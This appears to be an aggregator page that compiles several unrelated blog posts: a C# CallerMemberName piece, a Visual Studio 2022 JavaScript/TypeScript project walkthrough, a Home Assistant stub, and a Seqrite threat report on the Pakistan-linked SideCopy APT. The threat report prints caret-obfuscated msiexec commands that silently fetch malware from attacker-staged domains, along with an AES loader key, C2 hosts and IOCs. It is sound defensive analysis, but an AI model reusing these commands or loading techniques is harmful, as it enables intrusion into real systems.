        <>o__0.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "SayMyName", null, typeFromHandle, array));
      }
      <>o__0.<>p__0.Target(<>o__0.<>p__0, arg);
    }
    

    I have to admit that I don’t understand why this happens: if you want, drop a comment to explain to us what is going on, I’d love to learn more about it! 📩

    Event handlers can get the method name

    Then, we have custom events.

    We define events in one place, but they are executed indirectly.

    private void CallViaEventHandler()
    {
      Console.WriteLine("Calling via events:");
      var eventSource = new MyEventClass();
      eventSource.MyEvent += (sender, e) => SayMyName();
      eventSource.TriggerEvent();
    }
    
    public class MyEventClass
    {
      public event EventHandler MyEvent;
      public void TriggerEvent() =>
      // Raises an event which in our case calls SayMyName via subscribing lambda method
      MyEvent?.Invoke(this, EventArgs.Empty);
    }
    

    So, what will the result be? “Who” is the caller of this method?

    Calling via events:
    The method name is CallViaEventHandler!
    

    Again, it all boils down to how the method is generated at compile time: even if the actual execution is performed “asynchronously” – I know, it’s not the most obvious word for this case – at compile time the method is declared by the CallViaEventHandler method.

    CallerMemberName from the Class constructor

    Lastly, what happens when we call it from the constructor?

    public CallerMemberNameTests(IOutput output) : base(output)
    {
     Console.WriteLine("Calling from the constructor");
     SayMyName();
    }
    

    We can consider constructors to be a special kind of method, but what’s in their names? What can we find?

    Calling from the constructor
    The method name is .ctor!
    

    Yes, the actual method name is .ctor! Regardless of the class name, the constructor is considered to be a method with that specific internal name.

    Wrapping up

    In this article, we started from a “simple” topic but learned a few things about how code is compiled and the differences between runtime and compile time.

    As always, things are not as easy as they appear!

    This article first appeared on Code4IT 🐧

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • HTML Editor Online with Instant Preview and Zero Setup



    HTML Editor Online with Instant Preview and Zero Setup



    Source link

  • Write and Test Code Instantly With an Online Python Editor



    Write and Test Code Instantly With an Online Python Editor



    Source link

  • New TTPs and Clusters of an APT driven by Multi-Platform Attacks

    New TTPs and Clusters of an APT driven by Multi-Platform Attacks


    Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.

    Threat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL side-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and repurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its capabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2 server.

    Key Findings

    • Usernames associated with attacker email IDs are impersonating a government personnel member with cyber security background, utilizing compromised IDs.
    • A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
    • Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
    • The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
    • New tactics such as reflective loading and AES decryption of resource section via PowerShell to deploy a custom version of C#-based open-source tool XenoRAT.
    • A modified variant of Golang-based open-source tool SparkRAT, is targeting Linux platforms, has been deployed via the same stager previously used for Poseidon and Ares RAT payloads.
    • A new RAT dubbed CurlBack utilizing DLL side-loading technique is used. It registers the victim with C2 server via UUID and supports file transfer using curl.
    • Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
    • A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
    • The parent group of SideCopy, APT36, has targeted Afghanistan after a long with a theme related to Office of the Prisoners Administration (OPA) under Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop MeshAgent RMM tool.

    Targeted sectors under the Indian Ministry

    • Railways
    • Oil & Gas
    • External Affairs
    • Defence

    Phishing Emails

    The campaign targeting the Defence sector beings with a phishing email dated 13 January 2025, with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.

    Fig. 1 – NDC Phishing Email (1)

    A second phishing email sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. This email originates from an official-looking email ID which is likely compromised. National Defence College (NDC) is a defence service training institute for strategic and practice of National Security located in Delhi, operates under the Ministry of Defence, India.

    Fig. 2 – NDC Phishing Email (2)

    The attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen active on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government personnel member with cyber security background.

    Fig. 3 – Attacker Email

    Decoy Documents

    The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute and highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all operating under the Ministry of Defence, India.

    Fig. 4 – NDC Calendar Decoy [Defence]

    Another phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different variants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that contains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.

    Fig. 5 – Holiday List Decoy [Railways]

    The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquarted in Mumbai, HPCL is a public sector undertaking in petroleum and natural gas industry and is a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.

    Fig. 6 – Cybersecurity Guidelines Decoy [Oil & Gas]

    Another document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is specifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company with headquarters in Mumbai.

    Fig. 7 – Catalogue Decoy [External Affairs]

    OpenDir and CredPhish

    A fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway entities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.

    Fig. 8 – Open directory

    A total of 13 sub-domains have been identified, which function as login portals for various systems such as:

    • Webmail
    • Safety Tank Management System
    • Payroll System
    • Set Authority

    These are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year. These login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City Municipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:

    • Chandrapur
    • Gadchiroli
    • Akola
    • Satara
    • Vasai Virar
    • Ballarpur
    • Mira Bhaindar
    Fig. 9 – Login portals hosted on fake domain

    The following table lists the identified sub-domains and the dates they were first observed:

    Sub-domains First Seen
    gadchiroli.egovservice[.]in 2024-12-16
    pen.egovservice[.]in 2024-11-27
    cpcontacts.egovservice[.]in

    cpanel.egovservice[.]in

    webdisk.egovservice[.]in

    cpcalendars.egovservice[.]in

    webmail.egovservice[.]in

    2024-01-03
    dss.egovservice[.]in

    cmc.egovservice[.]in

    2023-11-03
    mail.egovservice[.]in 2023-10-13
    pakola.egovservice[.]in

    pakora.egovservice[.]in

    2023-07-23
    egovservice[.]in 2023-06-16

    All these domains have the following DNS history primarily registered under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.

    Fig. 10 – DNS history

    Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.

    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Cluster-A

    The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.

    Fig. 11 – Cluster A

    Windows

    A spear-phishing email link downloads an archive file, that contains double extension (.pdf.lnk) shortcut. They are hosted on domains that look to be legitimate:

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

    The shortcut triggers cmd.exe with arguments that utilize escape characters (^) to evade detection and reduce readability. A new machine ID “dv-kevin” is seen with these files as we see “desktop-” prefix in its place usually.

    Fig. 12 – Shortcuts with double extension

    Utility msiexec.exe is used for installing the MSI packages that are hosted remotely. It uses quiet mode flag with the installation switch.

    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/

    The first domain mimics a fake e-governance site seen with the open directory, while the second one is a compromised domain that belongs to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable ConsoleApp1.exe which drops multiple PE files that are base64 encoded. Firstly, the decoy document is dropped in Public directory and opened, whereas remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:

    • Legitimate DLL: Sampeose.dll
    • Malicious DLL: DUI70.dll, identified as CurlBack RAT.
    Fig. 13 – Dropper within MSI package

    CurlBack RAT

    A signed Windows binary girbesre.exe with original name CameraSettingsUIHost.exe is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping a HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, which have the compilation timestamps as 2024-12-24 and 2024-12-30.

    Fig. 14 – Checking response ‘/antivmcommand’

    CurlBack RAT initially checks the response of a specific URL with the command ‘/antivmcommand’. If the response is “on”, it proceeds, otherwise it terminates itself thereby maintaining a check. It gathers system information, and any connected USB devices using the registry key:

    • “SYSTEM\\ControlSet001\\Enum\\USBSTOR”
    Fig. 15 – Retrieving system info and USB devices

    Displays connected and running processes are enumerated to check for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.

    Fig. 16 – Enumerate displays and processes

    Next, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\Users\<username>\.client_id.txt” along with the username.

    Fig. 17 – Client ID generated for C2 registration

    Before registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary, which can be observed at the location: “C:\Windows\System32\Tasks\OneDrive”.

    Fig. 18 – Scheduled Task

    Reversed strings appended to the C2 domain and their purpose:

    String Functionality
    /retsiger/ Register client with the C2
    /sdnammoc/ Fetch commands from C2
    /taebtraeh/ Check connection with C2 regularly
    /stluser/ Upload results to the C2

    Once registered, the connection is kept alive to retrieve any commands that are returned in the response.

    Fig. 19 – Commands response after registration

    If the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:

    Command Functionality
    info Gather system information
    download Download files from the host
    persistence Modify persistence settings
    run Execute arbitrary commands
    extract Extract data from the system
    permission Check and elevate privileges
    users Enumerate user accounts
    cmd Execute command-line operations
    Fig. 20 – Checking process privilege with ‘permission’ command

    Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that CURL within the malicious DLL is present to enumerate and transfer various file formats:

    • Image files: GIF, JPEG, JPG, SVG
    • Text files: TXT, HTML, PDF, XML
    Fig. 21 – CURL protocols supported

    Linux

    In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and SideCopy APTs respectively.

    Fig. 22 – Golang Stager for Linux

    Stager functionality:

    1. Uses wget command to download a decoy from egovservice domain into the target directory /.local/share and open it (National-Holidays-RH-PER_N-1.pdf).
    2. Download the final payload elf as /.local/share/xdg-open and execute.
    3. Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current username.

    The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with over 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.

    Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2

    Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep, hibernate and lock screen functions.

    Cluster-B

    The second cluster of SideCopy’s activities targets Windows systems, although we suspect that it is targeting Linux systems based on their infrastructure observed since 2023.

    Fig. 24 – Cluster B

    The infection starts with a spear-phishing email link, that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. This contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised domain:

    • “hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe”
    Fig. 25 – Archive with malicious LNK

    The machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy, although the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the group continues to utilize HTA-based stagers which remain almost fully undetected (FUD).

    Fig. 26 – Almost FUD stager of HTA

    The HTA file contains a Base64 encoded .NET payload BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in ProgramData directory and an addtional .NET stager as a PDF in the Public directory. Persistence is set via Run registry key with the name “Edgre” and executes as:

    • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

    Encrypted Payload

    The dropped .NET binary named ‘Myapp.pdb’ has two resource files:

    • “Myapp.Resources.Document.pdf”
    • “Myapp.Properties.Resources.resources”

    The first one is decoded using Caesar cipher with shift of 9 characters in backward direction. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of remote access trojan horses on windows operating systems”.

    Fig. 27– Document with appended payload

    Though it is not a decoy, an encrypted payload is appended at the end. The malware searches for the “%%EOF” marker to separate PDF data from EXE data. The PDF data is extracted from the start to the marker, while the EXE Data is extracted after skipping 6 bytes beyond the marker.

    Fig. 28 – Extracting EXE after EOF marker

    After some delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB) which is sent as an argument along with a key to trigger a PowerShell command.

    Fig. 29 – Extracting resource and triggering PowerShell

    PowerShell Stage

    The execution of PowerShell command with basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore policies and profile is seen. Two parameters are sent:

    • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
    • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

    After some delay, the encryption key is decoded from Base64, and the first 16 bytes are treated as the IV for AES encryption (CBC mode with PKCS7 padding). This is done to load the decrypted binary as a .NET assembly directly into memory, invoking its entry point.

    Fig. 30 – PowerShell decryption

    Custom Xeno RAT

    Dumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source remote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5 reverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string manipulation methods with C2 and port as 79.141.161[.]58:1256.

    Fig. 31 – Custom Xeno RAT

    Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.

    Infrastructure and Attribution

    Domains used for malware staging by the threat group. Most of them have registrar as GoDaddy.com, LLC.

    Staging Domain First Seen Created ASN
    modspaceinterior[.]com Jan 2025 Sept 2024 AS 46606 – GoDaddy
    drjagrutichavan[.]com Jan 2025 Oct 2021 AS 394695 – GoDaddy
    nhp.mowr[.]gov[.]in Dec 2024 Feb 2005 AS 4758 – National Informatics Centre
    egovservice[.]in Dec 2024 June 2023 AS 140641 – GoDaddy
    pmshriggssssiwan[.]in Nov 2024 Mar 2024 AS 47583 – Hostinger
    educationportals[.]in Aug 2024 Aug 2024 AS 22612 – NameCheap

    C2 domains have been created just before the campaign in the last week of December 2024. With Canadian registrar “Internet Domain Service BS Corp.”, they resolve to IPs with Cloudflare ASN 13335 located in California.

    C2 Domain Created IP ASN
    updates.widgetservicecenter[.]com 2024-Dec-25 104.21.15[.]163

    172.67.163[.]31

     

    ASN 13335 – Clouflare
    updates.biossysinternal[.]com 2024-Dec-23 172.67.167[.]230

    104.21.13[.]17

    ASN 202015 – HZ Hosting Ltd.

    The C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited of ASN 202015. The port used for communication is 1256 but an open RDP port 56777 is also observed.

    Fig. 32 – Diamond Model

    Both C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this ASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.

    Conclusion

    Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and external affairs ministries. The group has shifted from using HTA files to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like Xeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites are being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.

    SEQRITE Protection

    • LNK.SideCopy.49245.Gen
    • LNK.Trojan.49363.GC
    • SideCopy.Mal.49246.GC
    • HTA.SideCopy.49248.Gen
    • HTA.SideCopy.49247.Gen
    • HTA.Trojan.49362.GC
    • Trojan.Fmq

    IOCs

    Windows

    a5410b76d0cb36786e00d2968d3ab6e4 2024-National-Holidays-RH-PER_N-1.zip
    f404496abccfa93eed5dfda9d8a53dc6 2024-National-Holidays-RH-PER_N-1.pdf.lnk
    0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip
    57c2f8b4bbf4037439317a44c2263346 Security-Guidelines.pdf.lnk
    53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
    97c3328427b72f05f120e9a98b6f9b09 installerr.msi
    0690116134586d41a23baed300fc6355 ConsoleApp1.exe
    ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
    9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
    589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
    0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schedule for ndc 65 as discussed.txt
    8ceeeec0e33026114f028cbb006cb7fc policy update for this course.txt
    1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip
    7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk
    32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta
    a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
    b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf
    cf6681cf1f765edb6cae81eeed389f78 suport.exe
    c952aca2036d6646c0cffde9e6f22775 DevApp.exe (Custom Xeno RAT)

    Linux

    b5e71ff3932c5ef6319b7ca70f7ba8da 2024-National-Holidays-RH-PER_N-1.zip
    0a67bfda993152c93a212087677f9b60 2024-National-Holidays-RH-PER_N-1․pdf
    e165114280204c39e99cf0c650477bf8 clinsixfer.elf (Custom Spark RAT)

    C2

    79.141.161[.]58:1256 Xeno RAT
    updates.widgetservicecenter[.]com

    updates.biossysinternal[.]com

    CurlBack RAT

    URLs

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
    hxxps://updates.widgetservicecenter.com/antivmcommand
    hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
    hxxps://modspaceinterior.com/wp-content/upgrade/01/
    hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Staging domains

    modspaceinterior[.]com
    drjagrutichavan[.]com
    nhp.mowr[.]gov[.]in
    pmshriggssssiwan[.]in
    educationportals[.]in
    egovservice[.]in
    gadchiroli.egovservice[.]in

    pen.egovservice[.]in

    cpcontacts.egovservice[.]in

    cpanel.egovservice[.]in

    webdisk.egovservice[.]in

    cpcalendars.egovservice[.]in

    webmail.egovservice[.]in

    www.dss.egovservice[.]in

    www.cmc.egovservice[.]in

    cmc.egovservice[.]in

    dss.egovservice[.]in

    mail.egovservice[.]in

    www.egovservice[.]in

    www.pakola.egovservice[.]in

    pakola.egovservice[.]in

    www.pakora.egovservice[.]in

    pakora.egovservice[.]in

    Host and PDB

    C:\ProgramData\LavaSoft\Sampeose.dll
    C:\ProgramData\LavaSoft\DUI70.dll
    C:\ProgramData\LavaSoft\girbesre.exe
    C:\ProgramData\LavaSoft\svnides.hta
    C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
    C:\Users\Public\Downloads\Document.pdf
    C:\Users\Public\Downloads\suport.exe
    E:\finalRnd\Myapp\obj\Debug\Myapp.pdb

    Decoys

    320bc4426f4f152d009b6379b5257c78 2024-National-Holidays-RH-PER_N-1.pdf
    9de50f9357187b623b06fc051e3cac4f Security-Guidelines.pdf
    c9c98cf1624ec4717916414922f196be NDC65-Updated-Schedule.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf

    MITRE ATT&CK

    TTP Name
    Reconnaissance  
    T1589.002 Gather Victim Identity Information: Email Addresses
    Resource Development  
    T1583.001

    T1584.001

    T1587.001

    T1588.001

    T1588.002

    T1608.001

    T1608.005

    T1585.002

    T1586.002

    Acquire Infrastructure: Domains

    Compromise Infrastructure: Domains

    Develop Capabilities: Malware

    Obtain Capabilities: Malware

    Obtain Capabilities: Tool

    Stage Capabilities: Upload Malware

    Stage Capabilities: Link Target

    Establish Accounts: Email Accounts

    Compromise Accounts: Email Accounts

    Initial Access
    T1566.002 Phishing: Spear phishing Link
    Execution
    T1106

    T1129

    T1059

    T1047

    T1204.001

    T1204.002

    Native API

    Shared Modules

    Command and Scripting Interpreter

    Windows Management Instrumentation

    User Execution: Malicious Link

    User Execution: Malicious File

    Persistence
    T1053.003

    T1547.001

    Scheduled Task/Job: Cron

    Registry Run Keys / Startup Folder

    Privilege Escalation
    T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
    Defense Evasion
    T1036.005

    T1036.007

    T1140

    T1218.005

    T1574.002

    T1027

    T1620

    Masquerading: Match Legitimate Name or Location

    Masquerading: Double File Extension

    Deobfuscate/Decode Files or Information

    System Binary Proxy Execution: Mshta

    Hijack Execution Flow: DLL Side-Loading

    Obfuscated Files or Information

    Reflective Code Loading

    Discovery
    T1012

    T1016

    T1033

    T1057

    T1082

    T1083

    T1518.001

    Query Registry

    System Network Configuration Discovery

    System Owner/User Discovery

    Process Discovery

    System Information Discovery

    File and Directory Discovery

    Software Discovery: Security Software Discovery

    Collection
    T1005

    T1056.001

    T1123

    T1113

    T1560.001

    Data from Local System

    Input Capture: Keylogging

    Audio Capture

    Screen Capture

    Archive Collected Data: Archive via Utility

    Command and Control
    T1105

    T1571

    Ingress Tool Transfer

    Non-Standard Port

    Exfiltration
    T1041 Exfiltration Over C2 Channel

     

    Authors:

    Sathwik Ram Prakki

    Kartikkumar Jivani



    Source link

  • JavaScript and TypeScript Projects with React, Angular, or Vue in Visual Studio 2022 with or without .NET

    JavaScript and TypeScript Projects with React, Angular, or Vue in Visual Studio 2022 with or without .NET



    I was reading Gabby’s blog post about the new TypeScript/JavaScript project experience in Visual Studio 2022. You should read the docs on JavaScript and TypeScript in Visual Studio 2022.

    If you’re used to ASP.NET apps when you think about apps that are JavaScript heavy, “front end apps” or TypeScript focused, it can be confusing as to “where does .NET fit in?”

    You need to consider the responsibilities of your various projects or subsystems and the multiple totally valid ways you can build a web site or web app. Let’s consider just a few:

    1. An ASP.NET Web app that renders HTML on the server but uses TS/JS
      • This may have a Web API, Razor Pages, with or without the MVC pattern.
      • You maybe have just added JavaScript via <script> tags
      • Maybe you added a script minimizer/minifier task
      • Can be confusing because it can feel like your app needs to ‘build both the client and the server’ from one project
    2. A mostly JavaScript/TypeScript frontend app where the HTML could be served from any web server (node, kestrel, static web apps, nginx, etc)
      • This app may use Vue or React or Angular but it’s not an “ASP.NET app”
      • It calls backend Web APIs that may be served by ASP.NET, Azure Functions, 3rd party REST APIs, or all of the above
      • This scenario has sometimes been confusing for ASP.NET developers who may get confused about responsibility. Who builds what, where do things end up, how do I build and deploy this?

    VS2022 brings JavaScript and TypeScript support into VS with a full JavaScript Language Service based on TS. It provides a TypeScript NuGet Package so you can build your whole app with MSBuild and VS will do the right thing.

    NEW: Starting in Visual Studio 2022, there is a new JavaScript/TypeScript project type (.esproj) that allows you to create standalone Angular, React, and Vue projects in Visual Studio.

    The .esproj concept is great for folks familiar with Visual Studio as we know that a Solution contains one or more Projects. Visual Studio manages files for a single application in a Project. The project includes source code, resources, and configuration files. In this case we can have a .csproj for a backend Web API and an .esproj that uses a client side template like Angular, React, or Vue.

    Thing is, historically when Visual Studio supported Angular, React, or Vue, it’s templates were out of date and not updated enough. VS2022 uses the native CLIs for these front ends, solving that problem with Angular CLI, Create React App, and Vue CLI.

    If I am in VS and go “File New Project” there are Standalone templates that solve Example 2 above. I’ll pick JavaScript React.

    Standalone JavaScript Templates in VS2022

    Then I’ll click “Add integration for Empty ASP.NET Web API. This will give me a frontend with javascript ready to call a ASP.NET Web API backend. I’ll follow along here.

    Standalone JavaScript React Template

    It then uses the React CLI to make the front end, which again, is cool as it’s whatever version I want it to be.

    React Create CLI

    Then I’ll add my ASP.NET Web API backend to the same solution, so now I have an esproj and a csproj like this

    frontend and backend

    Now I have a nice clean two project system – in this case more JavaScript focused than .NET focused. This one uses npm to startup the project using their web development server and proxyMiddleware to proxy localhost:3000 calls over to the ASP.NET Web API project.

    Here is a React app served by npm calling over to the Weather service served from Kestrel on ASP.NET.

    npm app running in VS 2022 against an ASP.NET Web API

    This is inverted than most ASP.NET Folks are used to, and that’s OK. This shows me that Visual Studio 2022 can support either development style, use the CLI that is installed for whatever Frontend Framework, and allow me to choose what web server and web browser (via Launch.json) I want.

    If you want to flip it, and put ASP.NET Core as the primary and then bring in some TypeScript/JavaScript, follow this tutorial because that’s also possible!


    Sponsor: Make login Auth0’s problem. Not yours. Provide the convenient login features your customers want, like social login, multi-factor authentication, single sign-on, passwordless, and more. Get started for free.




    About Scott

    Scott Hanselman is a former professor, former Chief Architect in finance, now speaker, consultant, father, diabetic, and Microsoft employee. He is a failed stand-up comic, a cornrower, and a book author.

    facebook
    bluesky
    subscribe
    About   Newsletter

    Hosting By
    Hosted on Linux using .NET in an Azure App Service










    Source link

  • Using Home Assistant to integrate a Unifi Protect G4 Doorbell and Amazon Alexa to announce visitors

    Using Home Assistant to integrate a Unifi Protect G4 Doorbell and Amazon Alexa to announce visitors



    I am not a Home Assistant expert, but it’s clearly a massive and powerful ecosystem. I’ve interviewed the creator of Home Assistant on my podcast and I encourage you to check out that chat.

